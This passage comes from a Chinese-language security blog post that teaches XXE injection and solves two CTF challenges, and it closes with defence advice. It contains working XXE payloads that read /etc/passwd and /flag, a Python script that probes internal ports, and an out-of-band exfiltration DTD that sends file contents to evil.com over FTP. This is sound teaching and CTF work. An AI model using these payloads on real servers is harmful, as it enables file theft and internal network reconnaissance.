    xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;!DOCTYPE data SYSTEM "http://192.168.50.132:"""</span> <span class="token operator">+</span> str<span class="token punctuation">(</span>port<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""/" ["""</span>
    xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;!ELEMENT data (#PCDATA)> """</span>
    xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""]>"""</span>
    xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;data>7&lt;/data>"""</span>
    r <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span><span class="token string">'http://192.168.50.132/xxe_blind_test.php'</span><span class="token punctuation">,</span> data<span class="token operator">=</span>xml<span class="token punctuation">,</span>timeout<span class="token operator">=</span><span class="token number">5</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#print(port,r.elapsed.total_seconds())</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token string">"Connection refused"</span> <span class="token keyword">in</span> r<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">" [-]"</span><span class="token punctuation">,</span> port<span class="token punctuation">,</span> <span class="token string">" seems shut down"</span><span class="token punctuation">)</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">" [+]"</span><span class="token punctuation">,</span> port<span class="token punctuation">,</span> <span class="token string">"is up"</span><span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">9080</span><span class="token punctuation">,</span><span class="token number">9082</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        XXE<span class="token punctuation">(</span>i<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>无论什么脚本都需要根据实际的情况来决定，脚本不是一成不变的</p>
<h2 id="XXE漏洞挖掘"><a href="#XXE漏洞挖掘" class="headerlink" title="XXE漏洞挖掘"></a>XXE漏洞挖掘</h2><p>以下摘自：<code>https://ca01h.top/Web_security/basic_learning/20.xxe%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#%E6%80%9D%E8%80%83</code></p>
<h3 id="常用检测方法"><a href="#常用检测方法" class="headerlink" title="常用检测方法"></a>常用检测方法</h3><h4 id="首先查看XML是否可以成功解析"><a href="#首先查看XML是否可以成功解析" class="headerlink" title="首先查看XML是否可以成功解析"></a>首先查看XML是否可以成功解析</h4><pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;  
&lt;!DOCTYPE ANY [  
&lt;!ENTITY name &quot;test1&quot;&gt;]&gt;    
&lt;root&gt;&amp;name;&lt;/root&gt;
</code></pre>
<p>如果页面输出了test1，则可以解析XML。</p>
<h4 id="第二步查看是否支持DTD引用外部实体："><a href="#第二步查看是否支持DTD引用外部实体：" class="headerlink" title="第二步查看是否支持DTD引用外部实体："></a>第二步查看是否支持DTD引用外部实体：</h4><pre><code>&lt;?xml version=”1.0” encoding=”UTF-8”?&gt;  
&lt;!DOCTYPE ANY [  
&lt;!ENTITY % name SYSTEM &quot;http://myhost/index.html&quot;&gt;  
%name;  
]&gt;
</code></pre>
<p>然后在我的服务器上查看日志,如果有目标服务器向我的服务器发送了一条index.html的请求,说明<br>支持引用外部实体,很有可能存在xxe漏洞。</p>
<h4 id="外部普通实体"><a href="#外部普通实体" class="headerlink" title="外部普通实体"></a>外部普通实体</h4><p>当有回显时，利用file://协议:</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8"?></span>
    <span class="token doctype">&lt;!DOCTYPE lltest[
    &lt;!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"></span>
]> 
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>user</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span><span class="token punctuation">></span></span><span class="token entity" title="&xxe;">&amp;xxe;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>username</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>password</span><span class="token punctuation">></span></span>123456<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>password</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>user</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="外部参数实体"><a href="#外部参数实体" class="headerlink" title="外部参数实体"></a>外部参数实体</h4><p>当无回显，使用http协议:</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8"?></span>
<span class="token doctype">&lt;!DOCTYPE note[ 
&lt;!ENTITY % lltest SYSTEM "http://myhost:1234/test_xxe"></span>
%lltest;
]>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后在myhost监听1234端口(dnslog地址也可以),查看是否有http请求。</p>
<h3 id="JSON-字符串XXE"><a href="#JSON-字符串XXE" class="headerlink" title="JSON 字符串XXE"></a>JSON 字符串XXE</h3><p>现在基本上所有的web程序都放弃了XML而使用JSON作为Clinet-Server 通信的数据格式</p>
<p>不过虽然只可以正确的接收一种，但服务器可以解释多种，这就导致了即使使用JSON接收数据，仍会收到XXE注入攻击</p>
<p><strong>测试方法很简单,就是将<code>Content-Type: application/json</code>修改为<code>Content-Type: application/xml</code>，数据格式不变，查看是否报错:</strong><br><strong><code>&#123;&quot;errors&quot;:&#123;&quot;errorMessage&quot;:&quot;org.xml.sax.SAXParseException: XML document structures must start and end within the same entity.&quot;&#125;&#125;</code></strong><br>可以发现服务器是可以处理xml数据的，于是我们利用这个来进行攻击。<br>payload:</p>
<pre class="line-numbers language-xml"><code class="language-xml">...
Content-Type: application/xml
...
<span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8" ?></span>
<span class="token doctype">&lt;!DOCTYPE netspi [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" ></span>]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>root</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>param1</span><span class="token punctuation">></span></span>name<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>param1</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>param2</span><span class="token punctuation">></span></span><span class="token entity" title="&xxe;">&amp;xxe;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>param2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>root</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>查看是否可以读取敏感文件。</p>
<h3 id="利用FTP协议获取敏感信息"><a href="#利用FTP协议获取敏感信息" class="headerlink" title="利用FTP协议获取敏感信息"></a>利用FTP协议获取敏感信息</h3><p>利用ftp协议获取服务器信息/内网ip之类的技巧：<br>在攻击者服务器上运行rb脚本(模拟FTP服务器:<a target="_blank" rel="noopener" href="https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb),%E7%9B%91%E5%90%AC8080%E7%AB%AF%E5%8F%A3%E3%80%82">https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb),监听8080端口。</a><br>然后在web程序那里输入payload:</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE a [
   &lt;!ENTITY % asd SYSTEM "http://evil.com/ext.dtd"></span> 
   %asd; 
   %rrr; 
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>a</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>ext.dtd</p>
<pre class="line-numbers language-xml"><code class="language-xml">&lt;!ENTITY % b SYSTEM "file:///etc/passwd">
&lt;!ENTITY % c "&lt;!ENTITY <span class="token entity" title="&#37;">&amp;#37;</span> rrr SYSTEM 'ftp://evil.com:8000/%b;'>">
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>然后在模拟的FTP服务器上就会收到一些服务器信息/文件内容</p>
<p>技巧来自：<a target="_blank" rel="noopener" href="http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html">http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html</a></p>
<h3 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h3><p>有时Server会将用户的输入做一定的限制，但XXE的攻击模式和XML的传参方式注定限制不可能过多（会影响网站的性能），所以按过滤的情况百度即可</p>
<h2 id="无法调用外部实体时的注入"><a href="#无法调用外部实体时的注入" class="headerlink" title="无法调用外部实体时的注入"></a>无法调用外部实体时的注入</h2><h3 id="内部实体引用"><a href="#内部实体引用" class="headerlink" title="内部实体引用"></a>内部实体引用</h3><pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE message [
    &lt;!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd"></span>
    &lt;!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
    &lt;!ENTITY % ISOamso '
        &lt;!ENTITY <span class="token entity" title="&#x25;">&amp;#x25;</span> eval "&lt;!ENTITY <span class="token entity" title="&#x26;">&amp;#x26;</span>#x25; send SYSTEM <span class="token entity" title="&#x27;">&amp;#x27;</span>file://hhhhhhhh/?<span class="token entity" title="&#x25;">&amp;#x25;</span>file;<span class="token entity" title="&#x27;">&amp;#x27;</span>>">
        <span class="token entity" title="&#x25;">&amp;#x25;</span>eval;
        <span class="token entity" title="&#x25;">&amp;#x25;</span>send;
    '> 
    %remote;
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span>1234<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="三层嵌套"><a href="#三层嵌套" class="headerlink" title="三层嵌套"></a>三层嵌套</h3><pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE message [
    &lt;!ELEMENT message ANY></span>
    &lt;!ENTITY % para1 SYSTEM "file:///flag">
    &lt;!ENTITY % para '
        &lt;!ENTITY <span class="token entity" title="&#x25;">&amp;#x25;</span> para2 "&lt;!ENTITY <span class="token entity" title="&#x26;">&amp;#x26;</span>#x25; error SYSTEM <span class="token entity" title="&#x27;">&amp;#x27;</span>file:///<span class="token entity" title="&#x25;">&amp;#x25;</span>para1;<span class="token entity" title="&#x27;">&amp;#x27;</span>>">
        <span class="token entity" title="&#x25;">&amp;#x25;</span>para2;
    '>
    %para;
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span>10<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这部分可以看2019 Google CTF-XXE <code>https://zhuanlan.zhihu.com/p/88125925</code></p>
<p>应该算是XXE部分最难的题目</p>
<h2 id="XXE的防御"><a href="#XXE的防御" class="headerlink" title="XXE的防御"></a>XXE的防御</h2><p>以下摘自<code>https://ca01h.top/Web_security/basic_learning/20.xxe%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#XXE%E5%A6%82%E4%BD%95%E9%98%B2%E5%BE%A1</code></p>
<p>1、使用开发语言提供的禁用外部实体的方法<br>php:</p>
<pre><code>libxml_disable_entity_loader(true);
</code></pre>
<p>java:</p>
<pre><code>DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
</code></pre>
<p>Python:</p>
<pre><code>from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
</code></pre>
<p>2、过滤用户提交的XML数据<br>过滤关键字：<code>&lt;\!DOCTYPE</code>和<code>&lt;\!ENTITY</code>，或者<code>SYSTEM</code>和<code>PUBLIC</code>。<br>3、不允许XML中含有自己定义的DTD</p>
<h2 id="用CTF题目理解XXE攻击"><a href="#用CTF题目理解XXE攻击" class="headerlink" title="用CTF题目理解XXE攻击"></a>用CTF题目理解XXE攻击</h2><h3 id="NCTF2019-Fake-XML-cookbook"><a href="#NCTF2019-Fake-XML-cookbook" class="headerlink" title="[NCTF2019]Fake XML cookbook"></a>[NCTF2019]Fake XML cookbook</h3><p><img src="image-20210922115020731.png" alt="image-20210922115020731"></p>
<p>进入后首先可以看到一个登录页面，直接先上CTF三部曲——看源码、抓包、找后台</p>
<p><img src="image-20210922115306562.png" alt="image-20210922115306562"></p>
<p>这道题很直白，可以明显的看到这是XXE漏洞</p>
<p>如果是application/json  就要转为xml试一试了，一般来说，看传参格式是<code>&lt;...&gt;</code>基本就可以确定是xml了</p>
<p>当然也可以测试一下</p>
<p><img src="image-20210922121057721.png" alt="image-20210922121057721"></p>
<p>测试方法就是随便写一个不可能被过滤的字符，然后看看响应的回显</p>
<p>根据之前所学的XML语法，来构造payload,当然一般情况下可以直接百度payload</p>
<p><img src="image-20210922120057063.png" alt="image-20210922120057063"></p>
<blockquote>
<p>file伪协议payload：</p>
</blockquote>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE root [
&lt;!ENTITY file SYSTEM "file:///etc/passwd"></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>user</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span><span class="token punctuation">></span></span><span class="token entity" title="&file;">&amp;file;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>username</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>password</span><span class="token punctuation">></span></span>1111<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>password</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>user</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>file协议用于要读取的文件没有如<code>&lt;&amp;</code>等特殊字符的情况下，有特殊字符会导致失败报错</p>
<blockquote>
<p>php伪协议payload</p>
</blockquote>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE root [
&lt;!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>user</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span><span class="token punctuation">></span></span><span class="token entity" title="&file;">&amp;file;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>username</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>password</span><span class="token punctuation">></span></span>1111<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>password</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>user</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>php编写的网站中，php伪协议基本可以说是最可用的协议</p>
<p><img src="image-20210922120250632.png" alt="image-20210922120250632"></p>
<blockquote>
<p>查看内网的存活主机</p>
</blockquote>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE root [
&lt;!ENTITY file SYSTEM "file:///etc/hosts"></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>user</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span><span class="token punctuation">></span></span><span class="token entity" title="&file;">&amp;file;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>username</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>password</span><span class="token punctuation">></span></span>1111<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>password</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>user</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="image-20210922120340118.png" alt="image-20210922120340118"><br>主要就是使用几个Linux系统的特殊文件夹</p>
<p>这里也不只有/etc/hosts文件，还可以通用/proc目录下的多个文件查看，一般使用hosts足以</p>
<p>/proc文件目录：</p>
<pre class="line-numbers language-linux"><code class="language-linux">
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h4><pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE root [
&lt;!ENTITY file SYSTEM "file:///flag"></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>user</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span><span class="token punctuation">></span></span><span class="token entity" title="&file;">&amp;file;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>username</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>password</span><span class="token punctuation">></span></span>1111<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>password</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>user</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>调用其他服务器的DTD文档</p>
</blockquote>
<h4 id="先留着，服务器这几天炸了，没得试"><a href="#先留着，服务器这几天炸了，没得试" class="headerlink" title="(先留着，服务器这几天炸了，没得试)"></a>(先留着，服务器这几天炸了，没得试)</h4><blockquote>
<p>得到flag</p>
</blockquote>
<pre class="line-numbers language-flag"><code class="language-flag">flag{dd841ec9-3408-4ce8-9f13-b1304a2d987e}
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="2019-Google-CTF-XXE"><a href="#2019-Google-CTF-XXE" class="headerlink" title="2019 Google CTF-XXE"></a>2019 Google CTF-XXE</h3><p><img src="image-20210922135607013.png" alt="image-20210922135607013"></p>
<p>CTF三部曲直接开始</p>
<p><img src="image-20210922135954340.png" alt="image-20210922135954340"></p>
<p>json格式，学的XXE , 不妨试一试改xml</p>
<p><img src="image-20210922140541726.png" alt="image-20210922140541726"></p>
<p>将message从json格式改为xml格式</p>
<p><img src="image-20210922141010151.png" alt="image-20210922141010151"></p>
<p>回显成功</p>
<p>payload:</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8" ?></span>
<span class="token doctype">&lt;!DOCTYPE message [
&lt;!ELEMENT message (#PCDATA)></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">id</span> <span class="token attr-name">"1234010123502402340"</span><span class="token punctuation">></span></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span><span class="token entity" title="&id;">&amp;id;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>payload我是直接抄的wp，但后面我自己研究了一下，所以分析一波</p>
<p>不想看就跳过这部分</p>
<blockquote>
<p>分析</p>
</blockquote>
<p>将json格式的数据改为xml格式，可以使用工具也可以直接手敲，原理都一样</p>
<p>题目中给我们的是<code>&#123;&quot;message&quot;:&quot;135601360123502401401250&quot;&#125;</code></p>
<p>xml和json的数据有一个对应法则，json的key值对应xml标签，json的value对应xml的值</p>
<p>所以可以改为</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span>135601360123502401401250<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="image-20210922143808992.png" alt="image-20210922143808992"></p>
<p>报错，根据错误提示，我们需要一个XML-DTD</p>
<p>所以改为xml引用DTD的值</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE root [
&lt;!ENTITY aaa "135601360123502401401250"></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span><span class="token entity" title="&aaa;">&amp;aaa;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>仍然报错</p>
<p><img src="image-20210922144133336.png" alt="image-20210922144133336"></p>
<p>root和message不匹配，说明题目允许解析的DTD文档根标签需要和xml传入的标签一致，故将根标签改成message</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE message [
&lt;!ENTITY aaa "135601360123502401401250"></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span><span class="token entity" title="&aaa;">&amp;aaa;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>又报错，说没有ELEMENT声明，这个我真没查到为什么一定要写，大概和我没有把xml完整学一遍有关</p>
<p><img src="image-20210922144519907.png" alt="image-20210922144519907"></p>
<p>他说缺啥我就给啥</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype">&lt;!DOCTYPE message [
&lt;!ELEMENT message (#PCDATA)></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">aaa</span> <span class="token attr-name">"135601360123502401401250"</span><span class="token punctuation">></span></span>
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h1</span><span class="token punctuation">></span></span><span class="token entity" title="&aaa;">&amp;aaa;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h1</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这就是wp里的payload了</p>
<blockquote>
<p>CDATA和PCDATA</p>
</blockquote>
<ul>
<li>CDATA是指CDATA就是指字符串</li>
<li>PCDATA可以是字符串、子元素、字符串和子元素 ,是混合类型</li>
</ul>
<blockquote>
<p>攻击部分</p>
</blockquote>
<p>在成功后，开始攻击</p>
<p>回显不会改变，所以不能直接写请求包上面，而外部实体无法调用</p>
<pre class="line-numbers language-xml"><code class="language-xml">&lt;!ENTITY % dtd SYSTEM "https://x.com">
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>调用会直接报错</p>
<p>这里wp调用了Linux自带的dtd</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="utf-8"?></span> 
<span class="token doctype">&lt;!DOCTYPE message [ 
&lt;!ELEMENT message (#PCDATA)></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">id</span> <span class="token attr-name">"1234010123502402340"</span><span class="token punctuation">></span></span>

&lt;!ENTITY % dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">  //加载了自带的dtd
&lt;!ENTITY % ISOamsa '
  &lt;!ENTITY <span class="token entity" title="&#x25;">&amp;#x25;</span> file SYSTEM "https://x.com">  // 嵌套一个外部引用
  <span class="token entity" title="&#x25;">&amp;#x25;</span>file; // 引用外部引用
'> // &amp;#x25是HTML的一种编码方式
%dtd;
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span><span class="token entity" title="&id;">&amp;id;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="flag-1"><a href="#flag-1" class="headerlink" title="flag"></a>flag</h4><p>最终payload</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="utf-8"?></span> 
<span class="token doctype">&lt;!DOCTYPE message [ 
&lt;!ELEMENT message (#PCDATA)></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">id</span> <span class="token attr-name">"1234010123502402340"</span><span class="token punctuation">></span></span>

&lt;!ENTITY % dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
&lt;!ENTITY % ISOamsa '  // 重写docbookx.dtd的ISOamsa方法
  &lt;!ENTITY <span class="token entity" title="&#x25;">&amp;#x25;</span> file SYSTEM "file:///flag">
  &lt;!ENTITY <span class="token entity" title="&#x25;">&amp;#x25;</span> all "&lt;!ENTITY <span class="token entity" title="&#x26;">&amp;#x26;</span>#x25; xxe SYSTEM <span class="token entity" title="&#x27;">&amp;#x27;</span>https://x.com/<span class="token entity" title="&#x25;">&amp;#x25;</span>file;<span class="token entity" title="&#x27;">&amp;#x27;</span>
  >">
  <span class="token entity" title="&#x25;">&amp;#x25;</span>all;
  <span class="token entity" title="&#x25;">&amp;#x25;</span>xxe;
'>
%dtd;
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>message</span><span class="token punctuation">></span></span><span class="token entity" title="&id;">&amp;id;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>message</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="image-20210922174839837.png" alt="image-20210922174839837"></p>
<p><strong>ubuntu系统自带 <code>/usr/share/yelp/dtd/docbookx.dtd</code> 文件</strong></p>
<p><strong>它定义了很多参数实体并调用,所以我们可以在内部重写一个该dtd文件中含有的参数实体</strong></p>
<p><img src="image-20210922174507023.png" alt="image-20210922174507023"></p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><p><code>https://ca01h.top/Web_security/basic_learning/20.xxe%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8</code></p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Atmujie</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://atmujie.github.io/2021/09/17/XEE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">http://atmujie.github.io/2021/09/17/XEE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/</a>
